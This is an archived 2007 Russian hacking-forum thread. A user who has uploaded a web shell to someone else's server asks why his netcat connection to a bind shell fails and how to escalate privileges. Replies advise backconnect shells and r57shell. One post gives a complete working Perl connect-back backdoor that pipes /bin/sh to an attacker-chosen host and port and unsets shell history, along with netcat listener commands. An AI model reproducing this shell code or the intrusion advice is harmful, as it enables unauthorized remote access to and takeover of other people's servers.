PDA

Просмотр полной версии : проблемы с netcat


Ryumaster
27.02.2007, 22:54
День добрый!
Надеюсь, пишу в правильный раздел.
Закачал шелл, попал на перспективный и мощный сервак, залил bind.pl, открыл порт... Далее, пишу адрес сервака в netcat буквами, так же в виде ip, всё один хрен получаю: h_errno 11001 HOST_NOT_FOUND, отчего так?
Может есть программы, анологичные netcat, которые помогут мне в бравом деле поднятия прав?

gcc
28.02.2007, 03:06
telnet не подойдет?

zl0ba
28.02.2007, 04:01
Уверен ли ты что запустился бинд.пл, смотри в процесах. Посмотри на какой порт биндишь. Попробуй скачать нет кат с другого сайта. Запуск : site.ru 47111 ; 127.0.0.1 47111
Если не фига не вышло, попробуй сишный бинд.

andy13
28.02.2007, 11:59
Как вариант можно еще попробовать backconnect.
ip случаем не 192.168.*.*? ;)

hsi
28.02.2007, 12:46
Вполне вероятно, что на хосте правильно настроенный фаерволл. Попробуй backconnect.
Перед запуском backconnect'a на сервере запусти netcat у себя с параметрами -l [порт]
Хотя, если фаер действительно правильно настроенный и backconnect не поможет.

slider
28.02.2007, 13:21
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
# Resolving HostName
# Connecting... 127.0.0.1
# Spawning Shell
# Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print " Resolving HostName\n";
print " Connecting... $ARGV[0] \n";
print " Spawning Shell \n";
print " Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

_Pantera_
28.02.2007, 17:57
Скорее всего бинд блочит фаервол
Запусти неткат и там пропиши -l -p 4000
на сервак залей бекдур или пользуйся r57shell там он встроеный уже. Если он бует на перле подними права и пропиши perl ip 4000 И самое важно вписывай именно свой реальный ip

Ryumaster
28.02.2007, 21:29
Спасибо большое за ответы. Перепробую все перечисленные варианты.

Alexsize
01.03.2007, 09:39
Если ничего не поможет, напиши мне в асю 652041. Стопудовый способ есть.